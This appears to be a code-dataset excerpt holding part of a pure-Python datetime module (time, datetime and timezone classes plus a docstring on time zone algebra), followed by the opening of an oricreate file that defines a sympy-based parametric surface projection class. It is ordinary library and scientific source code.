if len(fmt) != 0:
return self.strftime(fmt)
return str(self)
# Timezone functions
def utcoffset(self):
"""Return the timezone offset in minutes east of UTC (negative west of
UTC)."""
if self._tzinfo is None:
return None
offset = self._tzinfo.utcoffset(None)
_check_utc_offset("utcoffset", offset)
return offset
def tzname(self):
"""Return the timezone name.
Note that the name is 100% informational -- there's no requirement that
it mean anything in particular. For example, "GMT", "UTC", "-500",
"-5:00", "EDT", "US/Eastern", "America/New York" are all valid replies.
"""
if self._tzinfo is None:
return None
name = self._tzinfo.tzname(None)
_check_tzname(name)
return name
def dst(self):
"""Return 0 if DST is not in effect, or the DST offset (in minutes
eastward) if DST is in effect.
This is purely informational; the DST offset has already been added to
the UTC offset returned by utcoffset() if applicable, so there's no
need to consult dst() unless you're interested in displaying the DST
info.
"""
if self._tzinfo is None:
return None
offset = self._tzinfo.dst(None)
_check_utc_offset("dst", offset)
return offset
def replace(self, hour=None, minute=None, second=None, microsecond=None,
tzinfo=True):
"""Return a new time with new values for the specified fields."""
if hour is None:
hour = self.hour
if minute is None:
minute = self.minute
if second is None:
second = self.second
if microsecond is None:
microsecond = self.microsecond
if tzinfo is True:
tzinfo = self.tzinfo
_check_time_fields(hour, minute, second, microsecond)
_check_tzinfo_arg(tzinfo)
return time(hour, minute, second, microsecond, tzinfo)
def __bool__(self):
if self.second or self.microsecond:
return True
offset = self.utcoffset() or timedelta(0)
return timedelta(hours=self.hour, minutes=self.minute) != offset
# Pickle support.
def _getstate(self):
us2, us3 = divmod(self._microsecond, 256)
us1, us2 = divmod(us2, 256)
basestate = bytes([self._hour, self._minute, self._second,
us1, us2, us3])
if self._tzinfo is None:
return (basestate,)
else:
return (basestate, self._tzinfo)
def __setstate(self, string, tzinfo):
if len(string) != 6 or string[0] >= 24:
raise TypeError("an integer is required")
(self._hour, self._minute, self._second,
us1, us2, us3) = string
self._microsecond = (((us1 << 8) | us2) << 8) | us3
if tzinfo is None or isinstance(tzinfo, _tzinfo_class):
self._tzinfo = tzinfo
else:
raise TypeError("bad tzinfo state arg %r" % tzinfo)
def __reduce__(self):
return (time, self._getstate())
_time_class = time # so functions w/ args named "time" can get at the class
time.min = time(0, 0, 0)
time.max = time(23, 59, 59, 999999)
time.resolution = timedelta(microseconds=1)
class datetime(date):
"""datetime(year, month, day[, hour[, minute[, second[, microsecond[,tzinfo]]]]])
The year, month and day arguments are required. tzinfo may be None, or an
instance of a tzinfo subclass. The remaining arguments may be ints.
"""
__slots__ = date.__slots__ + (
'_hour', '_minute', '_second',
'_microsecond', '_tzinfo')
def __new__(cls, year, month=None, day=None, hour=0, minute=0, second=0,
microsecond=0, tzinfo=None):
if isinstance(year, bytes) and len(year) == 10:
# Pickle support
self = date.__new__(cls, year[:4])
self.__setstate(year, month)
return self
_check_tzinfo_arg(tzinfo)
_check_time_fields(hour, minute, second, microsecond)
self = date.__new__(cls, year, month, day)
self._hour = hour
self._minute = minute
self._second = second
self._microsecond = microsecond
self._tzinfo = tzinfo
return self
# Read-only field accessors
@property
def hour(self):
"""hour (0-23)"""
return self._hour
@property
def minute(self):
"""minute (0-59)"""
return self._minute
@property
def second(self):
"""second (0-59)"""
return self._second
@property
def microsecond(self):
"""microsecond (0-999999)"""
return self._microsecond
@property
def tzinfo(self):
"""timezone info object"""
return self._tzinfo
@classmethod
def fromtimestamp(cls, t, tz=None):
"""Construct a datetime from a POSIX timestamp (like time.time()).
A timezone info object may be passed in as well.
"""
_check_tzinfo_arg(tz)
converter = _time.localtime if tz is None else _time.gmtime
t, frac = divmod(t, 1.0)
us = int(frac * 1e6)
# If timestamp is less than one microsecond smaller than a
# full second, us can be rounded up to 1000000. In this case,
# roll over to seconds, otherwise, ValueError is raised
# by the constructor.
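# (Illustrative: frac itself is strictly < 1.0, but limited float
# precision can make frac * 1e6 land exactly on 1000000.0, which is
# why the rollover guard below is needed.)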
if us == 1000000:
t += 1
us = 0
y, m, d, hh, mm, ss, weekday, jday, dst = converter(t)
ss = min(ss, 59) # clamp out leap seconds if the platform has them
result = cls(y, m, d, hh, mm, ss, us, tz)
if tz is not None:
result = tz.fromutc(result)
return result
@classmethod
def utcfromtimestamp(cls, t):
"Construct a UTC datetime from a POSIX timestamp (like time.time())."
t, frac = divmod(t, 1.0)
us = int(frac * 1e6)
# If timestamp is less than one microsecond smaller than a
# full second, us can be rounded up to 1000000. In this case,
# roll over to seconds, otherwise, ValueError is raised
# by the constructor.
if us == 1000000:
t += 1
us = 0
y, m, d, hh, mm, ss, weekday, jday, dst = _time.gmtime(t)
ss = min(ss, 59) # clamp out leap seconds if the platform has them
return cls(y, m, d, hh, mm, ss, us)
# XXX This is supposed to do better than we *can* do by using time.time(),
# XXX if the platform supports a more accurate way. The C implementation
# XXX uses gettimeofday on platforms that have it, but that isn't
# XXX available from Python. So now() may return different results
# XXX across the implementations.
@classmethod
def now(cls, tz=None):
"Construct a datetime from time.time() and optional time zone info."
t = _time.time()
return cls.fromtimestamp(t, tz)
@classmethod
def utcnow(cls):
"Construct a UTC datetime from time.time()."
t = _time.time()
return cls.utcfromtimestamp(t)
@classmethod
def combine(cls, date, time):
"Construct a datetime from a given date and a given time."
if not isinstance(date, _date_class):
raise TypeError("date argument must be a date instance")
if not isinstance(time, _time_class):
raise TypeError("time argument must be a time instance")
return cls(date.year, date.month, date.day,
time.hour, time.minute, time.second, time.microsecond,
time.tzinfo)
def timetuple(self):
"Return local time tuple compatible with time.localtime()."
dst = self.dst()
if dst is None:
dst = -1
elif dst:
dst = 1
else:
dst = 0
return _build_struct_time(self.year, self.month, self.day,
self.hour, self.minute, self.second,
dst)
def timestamp(self):
"Return POSIX timestamp as float"
if self._tzinfo is None:
return _time.mktime((self.year, self.month, self.day,
self.hour, self.minute, self.second,
-1, -1, -1)) + self.microsecond / 1e6
else:
return (self - _EPOCH).total_seconds()
def utctimetuple(self):
"Return UTC time tuple compatible with time.gmtime()."
offset = self.utcoffset()
if offset:
self -= offset
y, m, d = self.year, self.month, self.day
hh, mm, ss = self.hour, self.minute, self.second
return _build_struct_time(y, m, d, hh, mm, ss, 0)
def date(self):
"Return the date part."
return date(self._year, self._month, self._day)
def time(self):
"Return the time part, with tzinfo None."
return time(self.hour, self.minute, self.second, self.microsecond)
def timetz(self):
"Return the time part, with same tzinfo."
return time(self.hour, self.minute, self.second, self.microsecond,
self._tzinfo)
def replace(self, year=None, month=None, day=None, hour=None,
minute=None, second=None, microsecond=None, tzinfo=True):
"""Return a new datetime with new values for the specified fields."""
if year is None:
year = self.year
if month is None:
month = self.month
if day is None:
day = self.day
if hour is None:
hour = self.hour
if minute is None:
minute = self.minute
if second is None:
second = self.second
if microsecond is None:
microsecond = self.microsecond
if tzinfo is True:
tzinfo = self.tzinfo
_check_date_fields(year, month, day)
_check_time_fields(hour, minute, second, microsecond)
_check_tzinfo_arg(tzinfo)
return datetime(year, month, day, hour, minute, second,
microsecond, tzinfo)
def astimezone(self, tz=None):
if tz is None:
if self.tzinfo is None:
raise ValueError("astimezone() requires an aware datetime")
ts = (self - _EPOCH) // timedelta(seconds=1)
localtm = _time.localtime(ts)
local = datetime(*localtm[:6])
try:
# Extract TZ data if available
gmtoff = localtm.tm_gmtoff
zone = localtm.tm_zone
except AttributeError:
# Compute UTC offset and compare with the value implied
# by tm_isdst. If the values match, use the zone name
# implied by tm_isdst.
delta = local - datetime(*_time.gmtime(ts)[:6])
dst = _time.daylight and localtm.tm_isdst > 0
gmtoff = -(_time.altzone if dst else _time.timezone)
if delta == timedelta(seconds=gmtoff):
tz = timezone(delta, _time.tzname[dst])
else:
tz = timezone(delta)
else:
tz = timezone(timedelta(seconds=gmtoff), zone)
elif not isinstance(tz, tzinfo):
raise TypeError("tz argument must be an instance of tzinfo")
mytz = self.tzinfo
if mytz is None:
raise ValueError("astimezone() requires an aware datetime")
if tz is mytz:
return self
# Convert self to UTC, and attach the new time zone object.
myoffset = self.utcoffset()
if myoffset is None:
raise ValueError("astimezone() requires an aware datetime")
utc = (self - myoffset).replace(tzinfo=tz)
# Convert from UTC to tz's local time.
return tz.fromutc(utc)
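# Conversion sketch (illustrative): datetime(2011, 1, 1, 12,
# tzinfo=timezone.utc).astimezone(timezone(timedelta(hours=-5))) yields
# the same instant spelled 2011-01-01 07:00:00-05:00.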
# Ways to produce a string.
def ctime(self):
"Return ctime() style string."
weekday = self.toordinal() % 7 or 7
return "%s %s %2d %02d:%02d:%02d %04d" % (
_DAYNAMES[weekday],
_MONTHNAMES[self._month],
self._day,
self._hour, self._minute, self._second,
self._year)
def isoformat(self, sep='T'):
"""Return the time formatted according to ISO.
This is 'YYYY-MM-DD HH:MM:SS.mmmmmm', or 'YYYY-MM-DD HH:MM:SS' if
self.microsecond == 0.
If self.tzinfo is not None, the UTC offset is also attached, giving
'YYYY-MM-DD HH:MM:SS.mmmmmm+HH:MM' or 'YYYY-MM-DD HH:MM:SS+HH:MM'.
Optional argument sep specifies the separator between date and
time, default 'T'.
"""
s = ("%04d-%02d-%02d%c" % (self._year, self._month, self._day,
sep) +
_format_time(self._hour, self._minute, self._second,
self._microsecond))
off = self.utcoffset()
if off is not None:
if off.days < 0:
sign = "-"
off = -off
else:
sign = "+"
hh, mm = divmod(off, timedelta(hours=1))
assert not mm % timedelta(minutes=1), "whole minute"
mm //= timedelta(minutes=1)
s += "%s%02d:%02d" % (sign, hh, mm)
return s
def __repr__(self):
"""Convert to formal string, for repr()."""
L = [self._year, self._month, self._day, # These are never zero
self._hour, self._minute, self._second, self._microsecond]
if L[-1] == 0:
del L[-1]
if L[-1] == 0:
del L[-1]
s = ", ".join(map(str, L))
s = "%s(%s)" % ('datetime.' + self.__class__.__name__, s)
if self._tzinfo is not None:
assert s[-1:] == ")"
s = s[:-1] + ", tzinfo=%r" % self._tzinfo + ")"
return s
def __str__(self):
"Convert to string, for str()."
return self.isoformat(sep=' ')
@classmethod
def strptime(cls, date_string, format):
'string, format -> new datetime parsed from a string (like time.strptime()).'
import _strptime
return _strptime._strptime_datetime(cls, date_string, format)
def utcoffset(self):
"""Return the timezone offset in minutes east of UTC (negative west of
UTC)."""
if self._tzinfo is None:
return None
offset = self._tzinfo.utcoffset(self)
_check_utc_offset("utcoffset", offset)
return offset
def tzname(self):
"""Return the timezone name.
Note that the name is 100% informational -- there's no requirement that
it mean anything in particular. For example, "GMT", "UTC", "-500",
"-5:00", "EDT", "US/Eastern", "America/New York" are all valid replies.
"""
name = _call_tzinfo_method(self._tzinfo, "tzname", self)
_check_tzname(name)
return name
def dst(self):
"""Return 0 if DST is not in effect, or the DST offset (in minutes
eastward) if DST is in effect.
This is purely informational; the DST offset has already been added to
the UTC offset returned by utcoffset() if applicable, so there's no
need to consult dst() unless you're interested in displaying the DST
info.
"""
if self._tzinfo is None:
return None
offset = self._tzinfo.dst(self)
_check_utc_offset("dst", offset)
return offset
# Comparisons of datetime objects with other.
def __eq__(self, other):
if isinstance(other, datetime):
return self._cmp(other, allow_mixed=True) == 0
elif not isinstance(other, date):
return NotImplemented
else:
return False
def __ne__(self, other):
if isinstance(other, datetime):
return self._cmp(other, allow_mixed=True) != 0
elif not isinstance(other, date):
return NotImplemented
else:
return True
def __le__(self, other):
if isinstance(other, datetime):
return self._cmp(other) <= 0
elif not isinstance(other, date):
return NotImplemented
else:
_cmperror(self, other)
def __lt__(self, other):
if isinstance(other, datetime):
return self._cmp(other) < 0
elif not isinstance(other, date):
return NotImplemented
else:
_cmperror(self, other)
def __ge__(self, other):
if isinstance(other, datetime):
return self._cmp(other) >= 0
elif not isinstance(other, date):
return NotImplemented
else:
_cmperror(self, other)
def __gt__(self, other):
if isinstance(other, datetime):
return self._cmp(other) > 0
elif not isinstance(other, date):
return NotImplemented
else:
_cmperror(self, other)
def _cmp(self, other, allow_mixed=False):
assert isinstance(other, datetime)
mytz = self._tzinfo
ottz = other._tzinfo
myoff = otoff = None
if mytz is ottz:
base_compare = True
else:
myoff = self.utcoffset()
otoff = other.utcoffset()
base_compare = myoff == otoff
if base_compare:
return _cmp((self._year, self._month, self._day,
self._hour, self._minute, self._second,
self._microsecond),
(other._year, other._month, other._day,
other._hour, other._minute, other._second,
other._microsecond))
if myoff is None or otoff is None:
if allow_mixed:
return 2 # arbitrary non-zero value
else:
raise TypeError("cannot compare naive and aware datetimes")
# XXX What follows could be done more efficiently...
diff = self - other # this will take offsets into account
if diff.days < 0:
return -1
return diff and 1 or 0
def __add__(self, other):
"Add a datetime and a timedelta."
if not isinstance(other, timedelta):
return NotImplemented
delta = timedelta(self.toordinal(),
hours=self._hour,
minutes=self._minute,
seconds=self._second,
microseconds=self._microsecond)
delta += other
hour, rem = divmod(delta.seconds, 3600)
minute, second = divmod(rem, 60)
if 0 < delta.days <= _MAXORDINAL:
return datetime.combine(date.fromordinal(delta.days),
time(hour, minute, second,
delta.microseconds,
tzinfo=self._tzinfo))
raise OverflowError("result out of range")
__radd__ = __add__
def __sub__(self, other):
"Subtract two datetimes, or a datetime and a timedelta."
if not isinstance(other, datetime):
if isinstance(other, timedelta):
return self + -other
return NotImplemented
days1 = self.toordinal()
days2 = other.toordinal()
secs1 = self._second + self._minute * 60 + self._hour * 3600
secs2 = other._second + other._minute * 60 + other._hour * 3600
base = timedelta(days1 - days2,
secs1 - secs2,
self._microsecond - other._microsecond)
if self._tzinfo is other._tzinfo:
return base
myoff = self.utcoffset()
otoff = other.utcoffset()
if myoff == otoff:
return base
if myoff is None or otoff is None:
raise TypeError("cannot mix naive and timezone-aware time")
return base + otoff - myoff
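# Subtraction sketch (illustrative): with fixed offsets, 12:00+01:00 minus
# 12:00+02:00 gives base = 0, then base + otoff - myoff = +2h - 1h = one
# hour -- matching the gap between the instants 11:00 UTC and 10:00 UTC.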
def __hash__(self):
tzoff = self.utcoffset()
if tzoff is None:
return hash(self._getstate()[0])
days = _ymd2ord(self.year, self.month, self.day)
seconds = self.hour * 3600 + self.minute * 60 + self.second
return hash(timedelta(days, seconds, self.microsecond) - tzoff)
# Pickle support.
def _getstate(self):
yhi, ylo = divmod(self._year, 256)
us2, us3 = divmod(self._microsecond, 256)
us1, us2 = divmod(us2, 256)
basestate = bytes([yhi, ylo, self._month, self._day,
self._hour, self._minute, self._second,
us1, us2, us3])
if self._tzinfo is None:
return (basestate,)
else:
return (basestate, self._tzinfo)
def __setstate(self, string, tzinfo):
(yhi, ylo, self._month, self._day, self._hour,
self._minute, self._second, us1, us2, us3) = string
self._year = yhi * 256 + ylo
self._microsecond = (((us1 << 8) | us2) << 8) | us3
if tzinfo is None or isinstance(tzinfo, _tzinfo_class):
self._tzinfo = tzinfo
else:
raise TypeError("bad tzinfo state arg %r" % tzinfo)
def __reduce__(self):
return (self.__class__, self._getstate())
datetime.min = datetime(1, 1, 1)
datetime.max = datetime(9999, 12, 31, 23, 59, 59, 999999)
datetime.resolution = timedelta(microseconds=1)
def _isoweek1monday(year):
# Helper to calculate the day number of the Monday starting week 1
# XXX This could be done more efficiently
THURSDAY = 3
firstday = _ymd2ord(year, 1, 1)
firstweekday = (firstday + 6) % 7 # See weekday() above
week1monday = firstday - firstweekday
if firstweekday > THURSDAY:
week1monday += 7
return week1monday
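# Example (illustrative): 2004-01-01 falls on a Thursday (firstweekday == 3,
# not past THURSDAY), so week 1 of 2004 starts on Monday 2003-12-29.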
class timezone(tzinfo):
__slots__ = '_offset', '_name'
# Sentinel value to disallow None
_Omitted = object()
def __new__(cls, offset, name=_Omitted):
if not isinstance(offset, timedelta):
raise TypeError("offset must be a timedelta")
if name is cls._Omitted:
if not offset:
return cls.utc
name = None
elif not isinstance(name, str):
raise TypeError("name must be a string")
if not cls._minoffset <= offset <= cls._maxoffset:
raise ValueError("offset must be a timedelta"
" strictly between -timedelta(hours=24) and"
" timedelta(hours=24).")
if (offset.microseconds != 0 or
offset.seconds % 60 != 0):
raise ValueError("offset must be a timedelta"
" representing a whole number of minutes")
return cls._create(offset, name)
@classmethod
def _create(cls, offset, name=None):
self = tzinfo.__new__(cls)
self._offset = offset
self._name = name
return self
def __getinitargs__(self):
"""pickle support"""
if self._name is None:
return (self._offset,)
return (self._offset, self._name)
def __eq__(self, other):
if type(other) != timezone:
return False
return self._offset == other._offset
def __hash__(self):
return hash(self._offset)
def __repr__(self):
"""Convert to formal string, for repr().
>>> tz = timezone.utc
>>> repr(tz)
'datetime.timezone.utc'
>>> tz = timezone(timedelta(hours=-5), 'EST')
>>> repr(tz)
"datetime.timezone(datetime.timedelta(-1, 68400), 'EST')"
"""
if self is self.utc:
return 'datetime.timezone.utc'
if self._name is None:
return "%s(%r)" % ('datetime.' + self.__class__.__name__,
self._offset)
return "%s(%r, %r)" % ('datetime.' + self.__class__.__name__,
self._offset, self._name)
def __str__(self):
return self.tzname(None)
def utcoffset(self, dt):
if isinstance(dt, datetime) or dt is None:
return self._offset
raise TypeError("utcoffset() argument must be a datetime instance"
" or None")
def tzname(self, dt):
if isinstance(dt, datetime) or dt is None:
if self._name is None:
return self._name_from_offset(self._offset)
return self._name
raise TypeError("tzname() argument must be a datetime instance"
" or None")
def dst(self, dt):
if isinstance(dt, datetime) or dt is None:
return None
raise TypeError("dst() argument must be a datetime instance"
" or None")
def fromutc(self, dt):
if isinstance(dt, datetime):
if dt.tzinfo is not self:
raise ValueError("fromutc: dt.tzinfo "
"is not self")
return dt + self._offset
raise TypeError("fromutc() argument must be a datetime instance"
" or None")
_maxoffset = timedelta(hours=23, minutes=59)
_minoffset = -_maxoffset
@staticmethod
def _name_from_offset(delta):
if delta < timedelta(0):
sign = '-'
delta = -delta
else:
sign = '+'
hours, rest = divmod(delta, timedelta(hours=1))
minutes = rest // timedelta(minutes=1)
return 'UTC{}{:02d}:{:02d}'.format(sign, hours, minutes)
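# Example (illustrative): timedelta(hours=-5) formats as 'UTC-05:00' and
# timedelta(hours=5, minutes=30) as 'UTC+05:30'.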
timezone.utc = timezone._create(timedelta(0))
timezone.min = timezone._create(timezone._minoffset)
timezone.max = timezone._create(timezone._maxoffset)
_EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)
"""
Some time zone algebra. For a datetime x, let
x.n = x stripped of its timezone -- its naive time.
x.o = x.utcoffset(), and assuming that doesn't raise an exception or
return None
x.d = x.dst(), and assuming that doesn't raise an exception or
return None
x.s = x's standard offset, x.o - x.d
Now some derived rules, where k is a duration (timedelta).
1. x.o = x.s + x.d
This follows from the definition of x.s.
2. If x and y have the same tzinfo member, x.s = y.s.
This is actually a requirement, an assumption we need to make about
sane tzinfo classes.
3. The naive UTC time corresponding to x is x.n - x.o.
This is again a requirement for a sane tzinfo class.
4. (x+k).s = x.s
This follows from #2, and from the fact that datetime+timedelta preserves tzinfo.
5. (x+k).n = x.n + k
Again follows from how arithmetic is defined.
Now we can explain tz.fromutc(x). Let's assume it's an interesting case
(meaning that the various tzinfo methods exist, and don't blow up or return
None when called).
The function wants to return a datetime y with timezone tz, equivalent to x.
x is already in UTC.
By #3, we want
y.n - y.o = x.n [1]
The algorithm starts by attaching tz to x.n, and calling that y. So
x.n = y.n at the start. Then it wants to add a duration k to y, so that [1]
becomes true; in effect, we want to solve [2] for k:
(y+k).n - (y+k).o = x.n [2]
By #1, this is the same as
(y+k).n - ((y+k).s + (y+k).d) = x.n [3]
By #5, (y+k).n = y.n + k, which equals x.n + k because x.n=y.n at the start.
Substituting that into [3],
x.n + k - (y+k).s - (y+k).d = x.n; the x.n terms cancel, leaving
k - (y+k).s - (y+k).d = 0; rearranging,
k = (y+k).s - (y+k).d; by #4, (y+k).s == y.s, so
k = y.s - (y+k).d
On the RHS, (y+k).d can't be computed directly, but y.s can be, and we
approximate k by ignoring the (y+k).d term at first. Note that k can't be
very large, since all offset-returning methods return a duration of magnitude
less than 24 hours. For that reason, if y is firmly in std time, (y+k).d must
be 0, so ignoring it has no consequence then.
In any case, the new value is
z = y + y.s [4]
It's helpful to step back and look at [4] from a higher level: it's simply
mapping from UTC to tz's standard time.
At this point, if
z.n - z.o = x.n [5]
we have an equivalent time, and are almost done. The insecurity here is
at the start of daylight time. Picture US Eastern for concreteness. The wall
time jumps from 1:59 to 3:00, and wall hours of the form 2:MM don't make good
sense then. The docs ask that an Eastern tzinfo class consider such a time to
be EDT (because it's "after 2"), which is a redundant spelling of 1:MM EST
on the day DST starts. We want to return the 1:MM EST spelling because that's
the only spelling that makes sense on the local wall clock.
In fact, if [5] holds at this point, we do have the standard-time spelling,
but that takes a bit of proof. We first prove a stronger result. What's the
difference between the LHS and RHS of [5]? Let
diff = x.n - (z.n - z.o) [6]
Now
z.n = by [4]
(y + y.s).n = by #5
y.n + y.s = since y.n = x.n
x.n + y.s = since z and y have the same tzinfo member,
y.s = z.s by #2
x.n + z.s
Plugging that back into [6] gives
diff =
x.n - ((x.n + z.s) - z.o) = expanding
x.n - x.n - z.s + z.o = cancelling
- z.s + z.o = by #2
z.d
So diff = z.d.
If [5] is true now, diff = 0, so z.d = 0 too, and we have the standard-time
spelling we wanted in the endcase described above. We're done. Contrarily,
if z.d = 0, then we have a UTC equivalent, and are also done.
If [5] is not true now, diff = z.d != 0, and z.d is the offset we need to
add to z (in effect, z is in tz's standard time, and we need to shift the
local clock into tz's daylight time).
Let
z' = z + z.d = z + diff [7]
and we can again ask whether
z'.n - z'.o = x.n [8]
If so, we're done. If not, the tzinfo class is insane, according to the
assumptions we've made. This also requires a bit of proof. As before, let's
compute the difference between the LHS and RHS of [8] (and skipping some of
the justifications for the kinds of substitutions we've done several times
already):
diff' = x.n - (z'.n - z'.o) = replacing z'.n via [7]
x.n - (z.n + diff - z'.o) = replacing diff via [6]
x.n - (z.n + x.n - (z.n - z.o) - z'.o) =
x.n - z.n - x.n + z.n - z.o + z'.o = cancel x.n
- z.n + z.n - z.o + z'.o = cancel z.n
- z.o + z'.o = #1 twice
-z.s - z.d + z'.s + z'.d = z and z' have same tzinfo
z'.d - z.d
So z' is UTC-equivalent to x iff z'.d = z.d at this point. If they are equal,
we've found the UTC-equivalent so are done. In fact, we stop with [7] and
return z', not bothering to compute z'.d.
How could z.d and z'.d differ? z' = z + z.d [7], so merely moving z' by
a dst() offset, and starting *from* a time already in DST (we know z.d != 0),
would have to change the result dst() returns: we start in DST, and moving
a little further into it takes us out of DST.
There isn't a sane case where this can happen. The closest it gets is at
the end of DST, where there's an hour in UTC with no spelling in a hybrid
tzinfo class. In US Eastern, that's 5:MM UTC = 0:MM EST = 1:MM EDT. During
that hour, on an Eastern clock 1:MM is taken as being in standard time (6:MM
UTC) because the docs insist on that, but 0:MM is taken as being in daylight
time (4:MM UTC). There is no local time mapping to 5:MM UTC. The local
clock jumps from 1:59 back to 1:00 again, and repeats the 1:MM hour in
standard time. Since that's what the local clock *does*, we want to map both
UTC hours 5:MM and 6:MM to 1:MM Eastern. The result is ambiguous
in local time, but so it goes -- it's the way the local clock works.
When x = 5:MM UTC is the input to this algorithm, x.o=0, y.o=-5 and y.d=0,
so z=0:MM. z.d=60 (minutes) then, so [5] doesn't hold and we keep going.
z' = z + z.d = 1:MM then, and z'.d=0, and z'.d - z.d = -60 != 0 so [8]
(correctly) concludes that z' is not UTC-equivalent to x.
Because we know z.d said z was in daylight time (else [5] would have held and
we would have stopped then), and we know z.d != z'.d (else [8] would have held
and we have stopped then), and there are only 2 possible values dst() can
return in Eastern, it follows that z'.d must be 0 (which it is in the example,
but the reasoning doesn't depend on the example -- it depends on there being
two possible dst() outcomes, one zero and the other non-zero). Therefore
z' must be in standard time, and is the spelling we want in this case.
Note again that z' is not UTC-equivalent as far as the hybrid tzinfo class is
concerned (because it takes z' as being in standard time rather than the
daylight time we intend here), but returning it gives the real-life "local
clock repeats an hour" behavior when mapping the "unspellable" UTC hour into
tz.
When the input is 6:MM, z=1:MM and z.d=0, and we stop at once, again with
the 1:MM standard time spelling we want.
So how can this break? One of the assumptions must be violated. Two
possibilities:
1) [2] effectively says that y.s is invariant across all y belonging to a given
time zone. This isn't true if, for political reasons or continental drift,
a region decides to change its base offset from UTC.
2) There may be versions of "double daylight" time where the tail end of
the analysis gives up a step too early. I haven't thought about that
enough to say.
In any case, it's clear that the default fromutc() is strong enough to handle
"almost all" time zones: so long as the standard offset is invariant, it
doesn't matter if daylight time transition points change from year to year, or
if daylight time is skipped in some years; it doesn't matter how large or
small dst() may get within its bounds; and it doesn't even matter if some
perverse time zone returns a negative dst(). So a breaking case must be
pretty bizarre, and a tzinfo subclass can override fromutc() if it is.
"""
# Brython does not have a _datetime module, so let's comment this out for now.
#try:
# from _datetime import *
#except ImportError:
# pass
#else:
# # Clean up unused names
# del (_DAYNAMES, _DAYS_BEFORE_MONTH, _DAYS_IN_MONTH,
# _DI100Y, _DI400Y, _DI4Y, _MAXORDINAL, _MONTHNAMES,
# _build_struct_time, _call_tzinfo_method, _check_date_fields,
# _check_time_fields, _check_tzinfo_arg, _check_tzname,
# _check_utc_offset, _cmp, _cmperror, _date_class, _days_before_month,
# _days_before_year, _days_in_month, _format_time, _is_leap,
# _isoweek1monday, _math, _ord2ymd, _time, _time_class, _tzinfo_class,
# _wrap_strftime, _ymd2ord)
# # XXX Since import * above excludes names that start with _,
# # docstring does not get overwritten. In the future, it may be
# # appropriate to maintain a single module level docstring and
# # remove the following line.
# #from _datetime import __doc__
| gpl-3.0 |
simvisage/oricreate | oricreate/fu/fu_target_face.py | 1 | 13873 | # -------------------------------------------------------------------------
#
# Copyright (c) 2009, IMB, RWTH Aachen.
# All rights reserved.
#
# This software is provided without warranty under the terms of the BSD
# license included in simvisage/LICENSE.txt and may be redistributed only
# under the conditions described in the aforementioned license. The license
# is also available online at http://www.simvisage.com/licenses/BSD.txt
#
# Thanks for using Simvisage open source!
#
# Created on Nov 18, 2011 by: rch
from scipy.optimize import fsolve
from traits.api import \
provides, HasTraits, List, \
Property, cached_property, Any,\
DelegatesTo, Float, Str, Array, \
Instance
import numpy as np
from oricreate.fu.fu_target_face_viz3d import \
FuTargetFaceViz3D
from oricreate.opt import \
IFu
from oricreate.util import \
x_, y_, z_, r_, s_, t_
from oricreate.viz3d import \
Visual3D
import sympy as sm
from .fu import \
Fu
class ParamFaceOperator(HasTraits):
'''
Parametric definition of a surface in 3D space
providing the operators for maintaining the normal
projection from a point x_pnt := [x_, y_, z_]
onto the surface point r_pnt := [r_, s_].
'''
# =========================================================================
# Point in R**3
# =========================================================================
X = Any
def _X_default(self):
return sm.Matrix([x_, y_, z_])
# =========================================================================
# Parametric surface F(r,s)
# =========================================================================
F = List(input=True)
def _F_default(self):
return [r_, s_, -r_ ** 2 - s_ ** 2 * t_]
F_mtx = Property(depends_on='F')
@cached_property
def _get_F_mtx(self):
return sm.Matrix(self.F)
F_fn = Property(depends_on='F')
@cached_property
def _get_F_fn(self):
return sm.lambdify([r_, s_, t_], list(self.F_mtx))
def get_F(self, r_pnt, t):
args = np.hstack([r_pnt, [t]])
return self.F_fn(*args)
# =========================================================================
# Surface derivatives [dF(r,s)/dr, dF(r,s)/ds]
# =========================================================================
dF_rs = Property(depends_on='F')
@cached_property
def _get_dF_rs(self):
return np.vstack([[sm.diff(x, var_) for x in self.F]
for var_ in [r_, s_]])
dF_rs_fn = Property(depends_on='F')
@cached_property
def _get_dF_rs_fn(self):
dF_rs = [[sm.diff(x, var_) for x in self.F] for var_ in [r_, s_]]
return sm.lambdify([r_, s_, t_], dF_rs)
def get_dF_rs(self, r_pnt, t):
args = np.hstack([r_pnt, [t]])
return self.dF_rs_fn(*args)
# =========================================================================
# normal vector
# =========================================================================
ls = Property(depends_on='+input')
@cached_property
def _get_ls(self):
'''Calculate the signed projection of the vector F -> X onto the
surface normal (the cross product of the two tangent vectors),
giving a level-set-like distance measure.
'''
# derivatives with respect to r and s
dF_r, dF_s = self.dF_rs
n_vct = np.cross(dF_r, dF_s)
# F -> X vector
XF_vct = self.X - self.F_mtx
XF_vct = np.array(XF_vct)[:, 0]
return np.dot(n_vct, XF_vct)
ls_fn = Property(depends_on='+input')
@cached_property
def _get_ls_fn(self):
return sm.lambdify([r_, s_, x_, y_, z_, t_], self.ls)
def get_ls(self, r_pnt, x_pnt, t):
args = np.hstack([r_pnt, x_pnt, [t]])
return self.ls_fn(*args)
# =========================================================================
# normality condition
# =========================================================================
norm_cond = Property(depends_on='+input')
@cached_property
def _get_norm_cond(self):
'''Calculate the projections of the vector X -> F onto
the plane tangent vectors of the surface.
'''
# derivatives with respect to r and s
dF_r, dF_s = self.dF_rs
# F -> X vector
XF_vct = self.X - self.F_mtx
XF_vct = np.array(XF_vct)[:, 0]
# projections of the XF vector onto tangent vectors
pr = np.inner(XF_vct, dF_r)
ps = np.inner(XF_vct, dF_s)
return [pr, ps]
norm_cond_fn = Property(depends_on='+input')
@cached_property
def _get_norm_cond_fn(self):
return sm.lambdify([r_, s_, x_, y_, z_, t_], self.norm_cond)
def get_norm_cond(self, r_pnt, x_pnt, t):
args = np.hstack([r_pnt, x_pnt, [t]])
return self.norm_cond_fn(*args)
# =========================================================================
# Derivative of the normality condition
# =========================================================================
d_norm_cond = Property(depends_on='+input')
@cached_property
def _get_d_norm_cond(self):
return [[sm.diff(x, var_) for x in self.norm_cond] for
var_ in [r_, s_]]
d_norm_cond_fn = Property(depends_on='+input')
@cached_property
def _get_d_norm_cond_fn(self):
return sm.lambdify([r_, s_, x_, y_, z_, t_], self.d_norm_cond)
def get_d_norm_cond(self, r_pnt, x_pnt, t):
args = np.hstack([r_pnt, x_pnt, [t]])
return self.d_norm_cond_fn(*args)
def get_r_pnt(self, r0_pnt, x_pnt, t):
'''Get the parametric coordinates of the nearest point on the surface.
'''
def get_norm_cond(r_pnt):
return self.get_norm_cond(r_pnt, x_pnt, t)
def get_d_norm_cond(r_pnt):
return self.get_d_norm_cond(r_pnt, x_pnt, t)
